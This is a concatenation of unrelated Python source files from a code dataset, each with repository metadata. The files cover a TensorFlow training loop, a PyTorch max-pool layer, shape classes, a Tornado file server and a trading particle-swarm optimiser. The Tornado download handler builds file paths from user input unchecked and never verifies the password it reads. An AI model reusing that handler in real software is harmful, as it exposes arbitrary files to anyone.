inputTrainLabel = trainLabel[ start: end ]
_, lossShow = sess.run( [ train_step, loss ], feed_dict = { input_x: inputTrainFeature, input_y: inputTrainLabel } )
#print( 'loss = ' + str( lossShow ) )
# get accuracy on a small subset of test data (just several epoch), a very fast approximation of the performance
testBatchNum = 3
testSubsetResult = [ None ] *( batch_size *testBatchNum )
testSubsetLabel = [ None ] *( batch_size *testBatchNum )
for testBatch in range( 0, testBatchNum ): # 3*32=96 test samples
start = testBatch * batch_size
end = start + batch_size
inputTestFeature = testFeature[ start: end, : ]
inputTestLabel = testLabel[ start: end, : ]
tempTestResult, tempAccuracyTest = sess.run( [ prediction, accuracy ], feed_dict = { input_x: inputTestFeature, input_y: inputTestLabel } )
testSubsetLabel[ start :end ] = np.argmax( inputTestLabel, 1 )
testSubsetResult[ start :end ] = np.argmax( tempTestResult, 1 )
#np.savetxt( newFolderName + '/testResult.csv', testResult, delimiter = ',' )
#np.savetxt( newFolderName + '/testLabel.csv', inputTestLabel, delimiter = ',' )
accuracyTest = accuracy_score( testSubsetLabel, testSubsetResult )
print( confusion_matrix( testSubsetLabel, testSubsetResult ) )
result[ 0, iteration ] = accuracyTest
print( 'Epoch:' + str( iteration ) + ' result on test: ' + str( accuracyTest ) )
# get accuracy on a small subset of training data (just one epoch), a very fast approximation of the training loss/ overfitting
inputTestTrainFeature = trainFeature[ 0: batch_size, : ]
inputTestTrainLabel = trainLabel[ 0: batch_size, : ]
testTrainResult, accuracyTrain = sess.run( [ prediction, accuracy ], feed_dict = { input_x: inputTestTrainFeature, input_y: inputTestTrainLabel } )
print( 'Epoch:' + str( iteration ) + ' result on train: ' + str( accuracyTrain ) )
np.savetxt( newFolderName + '/testTrainResult.csv', testTrainResult, delimiter = ',' )
np.savetxt( newFolderName + '/testTrainLabel.csv', inputTestTrainLabel, delimiter = ',' )
result[ 1, iteration ] = accuracyTrain
print( '-----------------------------' )
#print( sess.run(global_step) )
#print( sess.run(learning_rate) )
# record the accuracy of both test/ training error approximation on the small subset
np.savetxt( newFolderName + '/accuracy.csv', result, delimiter = ',' )
# print variable
# if iteration == 0:
# lastState = printVariable( sess, newFolderName = newFolderName )
# else:
# lastState = printVariable( sess, lastState, iteration + 1, newFolderName = newFolderName )
#np.savetxt( newFolderName + '/weightConv1' + str( iteration + 1 ) + '.csv', lastState, delimiter = ',' )
# save model every 10 epoches
if ( iteration + 1 )%10 == 0 and saveSign == True:
save_path = saver.save( sess, newFolderName + '/models/' + str( iteration + 1 ) + '_.ckpt' )
print("Model saved in file: %s" % save_path)
resultOnTest = result[ 0, : ]
resultOnTrain = result[ 1, : ]
plt.plot( list( range( iteration_num ) ), resultOnTrain )
plt.plot( list( range( iteration_num ) ), resultOnTest )
plt.savefig( newFolderName + '/accuracy.png' )
return resultOnTrain, resultOnTest
#%%
def printVariable( sess, lastState = -1, iteration = 1, newFolderName = -1 ):
layerList = [ 'conv1', 'conv2', 'conv3', 'conv4', 'conv5', 'conv6', 'conv7', 'conv8', 'dense1', 'dense2' ]
currentState = [ 0 ] *len( layerList )
for layerIndex in range( len( layerList ) ):
allFilter = tf.get_collection( tf.GraphKeys.GLOBAL_VARIABLES, scope= layerList[ layerIndex ] )
kernal = allFilter[ 0 ].eval( )
if layerIndex <= 7:
filterNum = kernal.shape[ 3 ]
filterSize = kernal.shape[ 1 ]
else:
filterNum = kernal.shape[ 1 ]
filterSize = kernal.shape[ 0 ]
currentState[ layerIndex ] = np.zeros( [ filterNum, filterSize ] )
for filterIndex in range( 0, filterNum ):
if layerIndex <= 7:
tempFilter = kernal[ 0, :, 0, filterIndex ]
else:
tempFilter = kernal[ :, filterIndex ]
#tempFilter = kernal[ : , filterIndex ]
#filterFFT = np.fft.fft( tempFilter )
currentState[ layerIndex ][ filterIndex, : ] = tempFilter
np.savetxt( newFolderName + '/weight/' + str( iteration ) + '_' + layerList[ layerIndex ] + '.csv', currentState[ layerIndex ], delimiter = ',' )
# plot filter
if lastState != -1:
diff = 100 *np.mean( ( abs(lastState[ layerIndex ] - currentState[ layerIndex ] ) / currentState[ layerIndex ] ) )
print( layerList[ layerIndex ] + ' : ' + str( diff ) )
return currentState
#%% load data, devide it into training/test set, and seperate out the laebls
# normalize the feature to [0, 1]
# for emotion tests, filter out value = 4 (other emotions)
# folder list, i.e., IEMCOCAP has 5 sessions, speakers are independent between sessions, always use leave-one-session-out stragegy
def loadData( testTask, testFolder = 4, precision = 'original', sampleRate = 16000, dataType = 'toyWaveform' ):
folderList = [ 0, 1, 2, 3, 4 ]
trainFolderList = folderList.copy( )
del trainFolderList[ testFolder ]
if dataType == 'toyWaveform':
dataFileFolder = '../../../processedData/toyWaveform/' + str( sampleRate ) + '_' + precision + '/session_'
elif dataType == 'waveform':
dataFileFolder = '../../../processedData/waveform/' + str( sampleRate ) + '_' + precision + '/session_'
elif dataType == 'toySpectrogram':
dataFileFolder = '../../../processedData/toySpectrogram/' + str( sampleRate ) + '_' + precision + '/session_'
elif dataType == 'spectrogram':
dataFileFolder = '../../../processedData/spectrogram/' + str( sampleRate ) + '_' + precision + '/session_'
fold = [ 0, 0, 0, 0, 0 ]
for i in folderList:
fold[ i ] = eval( 'iter_loadtxt( dataFileFolder + str(' + str( i + 1 ) + ') + ".csv" )' )
# seperate training and testing data
trainData = eval( 'np.concatenate( ( fold[ ' + str( trainFolderList[ 0 ] ) + \
' ], fold[ ' + str( trainFolderList[ 1 ] ) + \
' ], fold[ ' + str( trainFolderList[ 2 ] ) + \
' ], fold[ ' + str( trainFolderList[ 3 ] ) + ' ] ), axis=0 )' )
testData = eval( 'fold[ ' + str( testFolder ) + ' ]' )
if testTask == 'emotion':
trainFeature, trainLabel = processData( trainData, task = testTask, balance = 'balance', dataType = dataType ) # emotion is not
else:
trainFeature, trainLabel = processData( trainData, task = testTask, dataType = dataType )
testFeature, testLabel = processData( testData, task = testTask, dataType = dataType ) # note: don't balance the test set
plotInputDistribution( trainFeature )
#plotInputDistribution( testFeature[ 0, : ] )
return trainFeature, trainLabel , testFeature, testLabel
#%% calculate the number of elements of an high-dimensional tensor
def countElements( inputM ):
inputShape = inputM.shape
dim = 1
for i in inputShape:
dim *= i
return dim
#%%
def plotInputDistribution( inputM ):
output = np.reshape( inputM, [ countElements( inputM ) ] )
fig1 = plt.figure( )
ax1 = fig1.gca()
ax1.hist( output )
fig1.savefig( 'hist.png', bins = 500 )
|
[
"ygong1@nd.edu"
] |
ygong1@nd.edu
|
876265867be240579c0ef5056c8dc26bfcf83e95
|
82e9605ce72ce25246b76a88256432bde9981f5c
|
/weixin/__init__.py
|
29505c009361ed4415d045f9b58ca5a2dff9a241
|
[] |
no_license
|
qiwei123/wechat-sdk
|
6fd8ce818dcabe119ff87e43a48ffd44db5dd06e
|
9e55a1212ec764f9f3663b928a2f6fc87d74d6d9
|
refs/heads/master
| 2023-05-13T08:09:39.158651
| 2021-06-08T02:13:50
| 2021-06-08T02:13:50
| 374,851,423
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
# -*- coding: utf-8 -*-
__title__ = "requests"
__version__ = "0.1.0"
__author__ = "qk"
__license__ = "qk"
from .bind import WeixinClientError, WeixinAPIError
from .client import WeixinAPI
|
[
"qi.wei@qianka.com"
] |
qi.wei@qianka.com
|
85db6aaa022b862155183b3c5ddc4dd6968745b2
|
21f7fc432496abef7b9deff3eb76aa60e7ac7602
|
/ex001.py
|
fc23a1b0733e6aca3a9e04ae1618f8a18e0920e7
|
[
"MIT"
] |
permissive
|
rezende-marcus/script-python
|
6d2bb3c74a427614eebc913febdb8ef37576d3fb
|
b717d6ed2aba2787d6099abee0112224859ffefd
|
refs/heads/main
| 2023-04-23T23:11:01.963977
| 2021-05-12T21:24:02
| 2021-05-12T21:24:02
| 366,833,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84
|
py
|
nome = input('Qual รฉ o seu nome?')
print('ร um grande prazer te conhecer ', nome)
|
[
"mglrezende@yahoo.com.br"
] |
mglrezende@yahoo.com.br
|
51f845175e3601dffa096d89dd7b190d21db2e20
|
b79bf68dc0666d80c7145fdea7891f5b114e3f7d
|
/api/admin.py
|
cf9c8a60029d4c339dc0c3f987ab402706663dde
|
[] |
no_license
|
Chatbot-4ADS/Chatbot-Web-Server
|
34210ddd50cfaf935fa62868dd4f6d9851301b69
|
69ca1d09799a0ea38670f6ca6c53e65ae7a1281e
|
refs/heads/master
| 2023-01-22T14:15:13.581646
| 2020-12-04T23:48:52
| 2020-12-04T23:48:52
| 311,152,423
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Log)
|
[
"joao.braz@ekaizen-br.com"
] |
joao.braz@ekaizen-br.com
|
6c942b2bf53f2c5dd3278b4989aed9c2f3790bae
|
c6ec292a52ea54499a35a7ec7bc042a9fd56b1aa
|
/Python/1396.py
|
42df2b39f50cb44cdc466e7f32d62dd8cd8ccc59
|
[] |
no_license
|
arnabs542/Leetcode-38
|
ad585353d569d863613e90edb82ea80097e9ca6c
|
b75b06fa1551f5e4d8a559ef64e1ac29db79c083
|
refs/heads/master
| 2023-02-01T01:18:45.851097
| 2020-12-19T03:46:26
| 2020-12-19T03:46:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
class UndergroundSystem:
def __init__(self):
self.history = collections.defaultdict(dict)
self.idToStation = dict()
self.stationTostation = collections.defaultdict(dict)
def checkIn(self, id: int, stationName: str, t: int) -> None:
self.history[stationName][id] = t
self.idToStation[id] = stationName
def checkOut(self, id: int, stationName: str, t: int) -> None:
startStation = self.idToStation[id]
startTime = self.history[startStation][id]
self.stationTostation[startStation][stationName] = self.stationTostation[startStation].get(stationName, [])
self.stationTostation[startStation][stationName].append(t - startTime)
def getAverageTime(self, startStation: str, endStation: str) -> float:
return mean(self.stationTostation[startStation][endStation])
# Your UndergroundSystem object will be instantiated and called as such:
# obj = UndergroundSystem()
# obj.checkIn(id,stationName,t)
# obj.checkOut(id,stationName,t)
# param_3 = obj.getAverageTime(startStation,endStation)
|
[
"lo_vegood@126.com"
] |
lo_vegood@126.com
|
5cb42f6a646187203f7c5c1fe2425ef463c4c398
|
e2e72222b0b943bf43a247b0c89f9fc5c57acd88
|
/conv/maxpool2d.py
|
46ef5d6d04ad6c5d4a80271e4bf97e43f53d5b41
|
[] |
no_license
|
cxrasdfg/conv_test
|
8740bb547aa1c109bd6a3671b9f0f9386f0b4bfb
|
fc825bc852a7b24e97ad0e7d7549a112adedbcd3
|
refs/heads/master
| 2020-04-02T00:27:30.607652
| 2018-10-22T01:42:18
| 2018-10-22T01:42:18
| 153,805,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,484
|
py
|
# coding=utf-8
import torch as th
from .conv2d import Conv2D
class MaxPool2D(Conv2D):
def __init__(self,k_size,stride,padding):
super(MaxPool2D,self).__init__(0,0,k_size,stride,padding)
# useless
del self.channels_in,self.channels_out,self.weights,self.bias
self.last_idx=None
def forward(self,x):
r"""
Args:
x (th.tensor[float32]): [b,c_in,h_in,w_in]
Return:
x (th.tensor[float32]): [b,c_in,h_out,w_out]
"""
self.last_x=x
b,c_in,h_in,w_in=x.shape
k_size=self.kernel_size
# 1. change to matrix mul
# [b,c_in*k_size_h*k_size_w,num_patch], num_patch=h_out*w_out
patches,h_out,w_out=self._img2col(x)
num_patch=h_out*w_out
# 2. max pool
# [b,c,k_size_h*k_size_w,n]
patches=patches.view(b,c_in,k_size[0]*k_size[1],h_out*w_out)
self.last_patches=patches
x,idx=patches.max(dim=2) # [b,c,n]
self.last_idx=idx
# 3. reshape
x=x.view(b,c_in,h_out,w_out)
return x
def backward_and_update(self,dx,lr):
r"""
Args:
dx (th.tensor[float32]): [b,c_out,h_out,w_out)], c_in equals to c_out
lr (float): learning rate, no egg uses
Return:
dx (th.tensor[float32]): [b,c_in,h_in,w_in]
"""
k_size=self.kernel_size
b,c_out,h_out,w_out=dx.shape
# [b,c,k_size_h*k_size_w,n]
dpatches=self.last_patches
b,c,_,n=dpatches.shape
dpatches[:]=0
dpatches[
th.arange(b)[:,None,None].expand(-1,c,n).long(),
th.arange(c)[None,:,None].expand(b,-1,n).long(),
self.last_idx,
th.arange(n)[None,None].expand(b,c,-1).long()]=dx.view(b,c_out,-1)
# [b,c*k_size_h*k_size_w,n]
dpatches=dpatches.view(b,-1,n)
dpatches=self._col2img(dpatches,self.last_x.shape) # [b,c,h,w]
dx=dpatches
return dx
def main():
x=th.arange(2*3*4*4).view(2,3,4,4)
m=MaxPool2D((3,3),(3,1),(1,1))
m2=th.nn.MaxPool2d((3,3),(3,1),padding=(1,1))
patches=m(x)
patches2=m2(x)
print('error checking counter:',(patches!=patches2).sum() )
print(x)
print(patches)
dx=m.backward_and_update(patches.clone(),.1)
print(dx)
if __name__ == '__main__':
main()
|
[
"theppsh@example.com"
] |
theppsh@example.com
|
705ca1f24650faab554112bb06163766cb33c892
|
b6195a654bf9087869603241d19dab21e1942120
|
/plane_controller/plane.py
|
df577ef7ac811ce251e1a30137f7fc8975028047
|
[] |
no_license
|
coyle5280/FAA-CS-4250
|
fbe4522b8226fb9b50c1578dc18ce0132af6b406
|
cbda5c574cc187c87d4728583bab47fe661efb58
|
refs/heads/master
| 2021-01-17T12:41:42.883190
| 2015-11-02T07:58:42
| 2015-11-02T07:58:42
| 45,362,351
| 0
| 0
| null | 2015-11-01T23:44:13
| 2015-11-01T23:44:12
|
Python
|
UTF-8
|
Python
| false
| false
| 649
|
py
|
__author__ = 'group'
class PlaneObject(object):
transponder_code = 0
name = ''
current_lat = 0
current_long = 0
current_altitude = 0
current_velocity = 0
previous_velocity = 0
previous_lat = 0
previous_long = 0
previous_altitude = 0
def __init__(self, transponder_code, name, current_lat, current_long, current_altitude, current_velocity):
self.current_altitude = current_altitude
self.current_lat = current_lat
self.current_long = current_long
self.name = name
self.transponder_code = transponder_code
self.current_velocity = current_velocity
|
[
"coyle5280@gmail.com"
] |
coyle5280@gmail.com
|
9e86b56c8e63dbb82480d5d7e8cc0f38e215c547
|
3dc0f0bc9f1ef4840a05a29f88226f6f81decd6d
|
/Current/7-Scientific_Computing_With_Python/4-Polygon-Area-Calculator/shape_calculator.py
|
52204f84f16a50ba5288e98f2d3b288054dad84c
|
[] |
no_license
|
kal4EaI/Free-Code-Camp
|
ff31528cde74a044fa9425cd2ae5d1be4b3c81c5
|
3146386bb58d3852980ba2ec538e883ff9462bc4
|
refs/heads/master
| 2023-03-31T06:38:20.179473
| 2021-04-04T20:45:40
| 2021-04-04T20:45:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
class Rectangle:
def __init__(self, width, height):
self.width = width
self.height = height
def __str__(self):
return f'Rectangle(width={self.width}, height={self.height})'
def set_width(self, width):
self.width = width
def set_height(self, height):
self.height = height
def get_area(self):
return self.width * self.height
def get_perimeter(self):
return 2 * self.width + 2 * self.height
def get_diagonal(self):
return (self.width ** 2 + self.height ** 2) ** .5
def get_picture(self):
if self.width > 50 or self.height > 50:
return 'Too big for picture.'
picture = ''
for y in range(self.height):
for x in range(self.width):
picture = f'{picture}*'
picture = f'{picture}\n'
return picture
def get_amount_inside(self, shape):
return round_down(self.get_area() / shape.get_area(), 1)
class Square(Rectangle):
def __init__(self, side):
super().__init__(side, side)
def __str__(self):
return f'Square(side={self.height})'
def set_side(self, side):
self.height = side
self.width = side
def set_height(self, height):
self.set_side(height)
def set_width(self, width):
self.set_side(width)
def round_down(num, divisor):
return int(num - (num % divisor))
|
[
"vinarius@MARKK-P53S.localdomain"
] |
vinarius@MARKK-P53S.localdomain
|
a21061bf5358aaa201d3b893acf0ec084371341a
|
9589c56cfb7f5954f29eee55a7682a635d611e22
|
/main.py
|
999cac4e3e04c1b967126a9c312d3bbaa4b6d390
|
[] |
no_license
|
zacker-22/zdrive
|
aa86388b1f7f2a91c4052ec2dba34ee0e685a721
|
ae458da18a6856ac350b5872c27b1990f2d0e93f
|
refs/heads/master
| 2021-09-11T00:54:26.228077
| 2018-04-05T05:24:00
| 2018-04-05T05:24:00
| 116,158,070
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,848
|
py
|
import tornado
import tornado.httpserver
import tornado.ioloop
import tornado.web
import os, uuid
__UPLOADS__ = "./files/"
class Mainpage(tornado.web.RequestHandler):
def get(self):
self.render("mainpage.html")
class MainLogin(tornado.web.RequestHandler):
def post(self):
username=self.get_argument("username")
password=self.get_argument("password")
fileinfo = self.request.files['filearg'][0]
#print "fileinfo is", fileinfo
fname = fileinfo['filename']
extn = os.path.splitext(fname)[1]
cname = str(uuid.uuid4()) + extn
fh = open(__UPLOADS__ + fname, 'wb')
fh.write(fileinfo['body'])
def get(self):
self.render("mainpage.html")
class Download(tornado.web.RequestHandler):
def post(self):
username=self.get_argument("username")
password=self.get_argument("password")
filename=self.get_argument("filename")
if True:
file=username+"___"+filename
F=open("./files/"+file,"r")
G=open(file.lstrip(username+"___"),"w")
G.write(F.read())
F.close()
G.close()
file_name = file.lstrip(username+"___")
buf_size = 4096
self.set_header('Content-Type', 'application/octet-stream')
self.set_header('Content-Disposition', 'attachment; filename=' + file_name)
print "here"
with open(file_name, 'rb') as f:
while True:
data = f.read(buf_size)
print data
if not data:
break
self.write(data)
self.finish()
os.remove(file.lstrip(username+"___"))
def get(self):
print "here"
application = tornado.web.Application([
(r"/", Mainpage),
(r"/upload", MainLogin),
(r"/download", Download),
(r"/images/(.*)", tornado.web.StaticFileHandler, {'path': "./images"}),
(r"/css/(.*)", tornado.web.StaticFileHandler, {'path': "./css"}),
(r"/js/(.*)", tornado.web.StaticFileHandler, {'path': "./js"}),
(r"/img/(.*)", tornado.web.StaticFileHandler, {'path': "./img"}),
(r"/fonts/(.*)", tornado.web.StaticFileHandler, {'path': "./fonts"}),
(r"/(.*)", tornado.web.StaticFileHandler, {'path': "./"}),
(r"/files/(.*)", tornado.web.StaticFileHandler, {'path': "./files"}),
], debug=False)
if __name__ == "__main__":
http_server = tornado.httpserver.HTTPServer(application)
port = int(os.environ.get("PORT", 5000))
http_server.listen(port)
#print "Server running on Localhost:", port
tornado.ioloop.IOLoop.instance().start()
|
[
"Zacker"
] |
Zacker
|
d16ae67b41b1528bb0116d6a8e0870f587fefd41
|
89e4c3dd91ceb3a4a5e74cfaedbb795152ebd1f9
|
/lc105_bt.py
|
dd379a2e68cceb2a57826262c2634dc06cff9c75
|
[] |
no_license
|
Mela2014/lc_punch
|
a230af2c9d40b1af4932c800e72698de5b77d61a
|
498308e6a065af444a1d5570341231e4c51dfa3f
|
refs/heads/main
| 2023-07-13T03:44:56.963033
| 2021-08-25T05:44:40
| 2021-08-25T05:44:40
| 313,742,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:
if not preorder: return None
root_val = preorder[0]
root = TreeNode(root_val)
idx = inorder.index(root_val)
root.left = self.buildTree(preorder[1:idx+1], inorder[:idx])
root.right = self.buildTree(preorder[idx+1:], inorder[idx+1:])
return root
|
[
"noreply@github.com"
] |
noreply@github.com
|
741555ab98238029b76cb2720bb76e979fcebfd1
|
df85df3217b2f7a4fcd9c30d6a8c73a6a9d1709d
|
/step_one/show_result.py
|
b4b7c71e22ba2464afd2ab1006576a3c326dc2eb
|
[] |
no_license
|
qq763511774/Whole-Heart-Segmentation
|
924ed729ecda950e585a790feddf916806fd39ce
|
e73b7fba757466933e7405837f8c345899ad3f25
|
refs/heads/master
| 2023-01-27T15:55:44.326906
| 2020-12-10T12:51:30
| 2020-12-10T12:51:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 800
|
py
|
import SimpleITK as sitk
import numpy as np
import cv2
import os
import constant_model
def nii_gz_to_png(path_nii, path_png):
image = sitk.ReadImage(path_nii)
image_array = np.squeeze(sitk.GetArrayFromImage(image))
cv2.imwrite(path_png, image_array*255)
if __name__ == '__main__':
path_from = constant_model.show_result_from_path
path_to = constant_model.show_result_save_path
if not os.path.isdir(path_to):
os.makedirs(path_to)
for f_name in [f for f in os.listdir(path_from) if f.endswith('.nii.gz')]:
count = f_name.replace('.nii.gz', '')
path_nii = os.path.join(path_from, f_name)
path_png = os.path.join(path_to, count + '.png')
nii_gz_to_png(path_nii, path_png)
print(path_nii)
|
[
"noreply@github.com"
] |
noreply@github.com
|
a7cba2a9d41f25fd0315d124feb7c355ad033ed6
|
6ac945df1ff9cdc8b637aeb2e9cf21512e13204b
|
/check_size.py
|
b4074063654f5a0a54bef458d0ef7ef230764a3f
|
[] |
no_license
|
Phung82/XLA
|
9000ee14ebe4ad91ba0cc6714504819d8cbb2f03
|
bf299f67dc2439ca59e501c2532617b40b8b686d
|
refs/heads/master
| 2022-08-12T01:38:28.532112
| 2020-05-26T19:54:49
| 2020-05-26T19:54:49
| 267,138,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
from tkinter import *
window=Tk()
print(window.winfo_screenwidth())
print(window.winfo_screenheight())
window.mainloop()
|
[
"pn8778773@gmail.com"
] |
pn8778773@gmail.com
|
133232d3a2d4b8e120c9a54a44709de103ddac00
|
e6af5a4caa5857a07db4df2759a788ceb43608e1
|
/backend/utils/cleanup_md.py
|
651af5ea8a1c855c55832bc65edef18bddef58d7
|
[] |
no_license
|
LeonieFreisinger/ComplAInce
|
c069951ba9c91058cf9392a2368da3c2175b1c39
|
ffe5eea175f4fdef581987279dd61545bef9678b
|
refs/heads/main
| 2023-04-07T05:45:10.386918
| 2021-04-20T11:59:59
| 2021-04-20T11:59:59
| 358,588,226
| 1
| 1
| null | 2021-04-18T11:52:22
| 2021-04-16T12:13:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,677
|
py
|
from bs4 import BeautifulSoup
from markdown import markdown
import re
import os
def markdown_to_text(markdown_string):
""" Converts a markdown string to plaintext """
# md -> html -> text since BeautifulSoup can extract text cleanly
html = markdown(markdown_string)
# remove code snippets
html = re.sub(r'<pre>(.*?)</pre>', ' ', html)
html = re.sub(r'<code>(.*?)</code >', ' ', html)
# extract text
soup = BeautifulSoup(html, "html.parser")
text = ''.join(soup.findAll(text=True))
return text
def clean_up(raw):
raw = raw.split('\n')
raw = [el for el in raw if not el == '']
# remove all headlines
raw = [el for el in raw if not el[0] == '#']
raw = ' '.join(raw)
raw = markdown_to_text(raw)
raw = raw.split('"')
raw = ' '.join(raw)
raw = raw.split('\&39;')
raw = '\''.join(raw)
raw = re.sub(r"(?:__|[*#])|\[(.*?)\]\(.*?\)", '', raw)
raw = raw.split('|')
raw = ''.join(raw)
raw = raw.split('---')
raw = ''.join(raw)
raw = raw.split('_')
raw = ' '.join(raw)
raw = raw.split('"')
raw = ''.join(raw)
raw = raw.split(' ')
raw = [el for el in raw if not el == '']
raw = ' '.join(raw)
raw = raw.split('\\')
raw = ''.join(raw)
return raw
if __name__ == '__main__':
raw_md = '../data/raw_md'
raw_txt = '../data/raw_txt'
for filename in os.listdir(raw_md):
filename = filename[:-3]
with open(os.path.join(raw_md, f'{filename}.md'), 'r') as file:
raw = file.read()
raw = clean_up(raw)
with open(os.path.join(raw_txt, f'{filename}.txt'), 'w') as file:
file.write(raw)
|
[
"mail@andychen.de"
] |
mail@andychen.de
|
8eacf3c3b32ad7b2652ca50ab27a4e16e87ad6af
|
a47382be43966945c44033c8f16471bd1947f676
|
/PSO.py
|
49e52c0c9a0f58364238debb0fd121a159c118fd
|
[] |
no_license
|
ahmad-emanuel/quant_trading_system
|
c25e517af8dbb91fb69c88e3a9a72579793e73c2
|
980b09491e6d42986cd00aab429d5fd17039b282
|
refs/heads/master
| 2022-01-10T10:14:46.930090
| 2019-05-13T20:03:54
| 2019-05-13T20:03:54
| 117,387,403
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,100
|
py
|
import numpy as np
import pandas as pd
import copy
"""
Helper methods of class particle
"""
def rand_arr_sum_one(length):
arr = []
rand = np.random.ranf(length - 1)
rand = np.append(rand, [0, 1])
rand.sort()
for i in range(len(rand) - 1):
arr.append(rand[i + 1] - rand[i])
return arr
def update_velocity_micro_particle(w, c1, c2, velocity, position, post_best, global_best):
r1 = np.random.random()
r2 = np.random.random()
vel_cognitive = c1 * r1 * (post_best - position)
vel_social = c2 * r2 * (global_best - position)
new_velocity = (w * velocity) + vel_cognitive + vel_social
if new_velocity != 0:
return new_velocity
else:
return np.random.random_sample()
def update_position_micro_particle(position, velocity, bounds):
position = position + velocity
# adjust maximum position if necessary
if position > bounds[1]:
position = bounds[1]
# adjust maximum position if necessary
if position < bounds[0]:
position = bounds[0]
return position
"""
Helper of class PSO
"""
def analyse_result(position, df):
temp = pd.Series(
index=['position', 'algorithm_period_return', 'alpha', 'benchmark_period_return', 'returns', 'sharpe','portfolio_value'])
temp.position = position
temp.algorithm_period_return = np.mean(df.algorithm_period_return)
temp.alpha = np.mean(df.alpha)
temp.benchmark_period_return = np.mean(df.benchmark_period_return)
temp.returns = np.mean(df.returns)
temp.sharpe = np.mean(df.sharpe)
temp.portfolio_value = np.mean(df.portfolio_value[-1])
return temp
def sum_correction(position):
s = sum(position)
return [a / s for a in position]
"""
Particle Class
"""
class Particle(object):
# number of dimensions : number of indicators
num_dimension = 9
def __init__(self):
self.position = []
self.velocity = [[0.0] * Particle.num_dimension, [0.0] * Particle.num_dimension, 0.0, 0.0]
self.post_best = [[0.0] * Particle.num_dimension, [0.0] * Particle.num_dimension, 0.0, 0.0]
self.obj_best = -10000.0
self.current_obj = -10000.0
self.bounds = pd.Series([(0.0,1.0),(0.0,1.0),(-1.0,0.0)],index=['weights','DB','DS'])
##########test
self.datafra_result = pd.DataFrame()
# initialize position
self.initialize_position()
# this method initializes the weights of indicators
def initialize_position(self):
# initialize trend weights
self.position.append(rand_arr_sum_one(Particle.num_dimension))
# initialize non_trend weights
self.position.append(rand_arr_sum_one(Particle.num_dimension))
# initialize DB
self.position.append(np.random.random_sample())
# initialize DS
self.position.append(np.random.random_sample()-1.0)
# evaluate current fitness
def evaluate(self, obj_func):
back_tester = obj_func(self.position)
##############
#TEST
##############
self.current_obj, self.datafra_result = back_tester.run()
# check to see if the current position is an individual best
# type of optimization is maximize
if self.current_obj > self.obj_best:
self.post_best = copy.deepcopy(self.position)
self.obj_best = self.current_obj
# update the velocity of particle
def update_velocity(self, global_best):
if len(self.position) != len(global_best):
raise ValueError('the dimension of global best did not correspond with dimension of particles')
else:
w = 0.5 # constant inertia weight (how much to weigh the previous velocity)
c1 = 1 # cognitive constant
c2 = 1 # social constant
# update velocity of trend & non-trend weights
for j in range(2):
for i in range(0, Particle.num_dimension):
#print('(%s,%s)'%(i,j))
self.velocity[j][i] = update_velocity_micro_particle(w, c1, c2,
self.velocity[j][i],
self.position[j][i],
self.post_best[j][i],
global_best[j][i]
)
# update velocity of DB & DS
for i in range(2, 4):
self.velocity[i] = update_velocity_micro_particle(w, c1, c2,
self.velocity[i],
self.position[i],
self.post_best[i],
global_best[i]
)
def update_position(self):
# update position of weights
for i in range(2):
for j in range(0, Particle.num_dimension):
self.position[i][j] = update_position_micro_particle(
self.position[i][j],
self.velocity[i][j],
self.bounds.weights
)
# update position of DB & DS
for i in range(2, 4):
self.position[i] = update_position_micro_particle(self.position[i],
self.velocity[i],
self.bounds.ix[i-1]
)
# correct the weights so that the sum of them remains equal to 1
for i in range(2):
self.position[i] = sum_correction(self.position[i])
class PSO(object):
def __init__(self, obj_func, swarm_size, max_iter):
self.global_best_fit = -10000.0
self.global_best_sol = []
self.iter_num = 0
self.obj_func = obj_func
self.swarm_size = swarm_size
self.max_iter = max_iter
# test performance
self.performance = pd.DataFrame(columns=['position', 'algorithm_period_return', 'alpha', 'benchmark_period_return', 'returns', 'sharpe','portfolio_value'])
def run(self):
# create swarm (population)
swarm = []
for i in range(0, self.swarm_size):
swarm.append(Particle())
# optimization loop
while self.iter_num < self.max_iter:
count = 0
# iterate over particles in swarm and evaluate fitness
for i in range(self.swarm_size):
swarm[i].evaluate(self.obj_func)
# determine the best global particle
# type of optimization is maximize
if swarm[i].current_obj > self.global_best_fit:
self.global_best_sol = copy.deepcopy(swarm[i].position)
self.global_best_fit = swarm[i].current_obj
# store global best
self.performance.loc[str(self.iter_num)+'.'+str(count)] = analyse_result(copy.deepcopy(swarm[i].position),
swarm[i].datafra_result)
count += 1
# update velocity and position
for i in range(self.swarm_size):
swarm[i].update_velocity(self.global_best_sol)
swarm[i].update_position()
# store global best
self.performance.to_pickle('global_best_solutions')
print('performance stored in iteration : '+str(self.iter_num))
self.iter_num += 1
|
[
"ahmadh@campus.uni-paderborn.de"
] |
ahmadh@campus.uni-paderborn.de
|
005120b02c600aa0241e390bd256d154160f0200
|
343b75d19d23336274d47c73185cc1afee927841
|
/kfood/urls.py
|
923622c463c48f2937b310af0c51aa1f66bc9e46
|
[] |
no_license
|
allan2327/kfood-server
|
850aff71fae44d1327a01b30f7363e6d967a61a9
|
11a47c250809cc991dc9e74988b8b60525c903a6
|
refs/heads/master
| 2020-06-28T05:12:40.977091
| 2016-03-08T04:42:45
| 2016-03-08T04:42:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,209
|
py
|
"""kfood URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
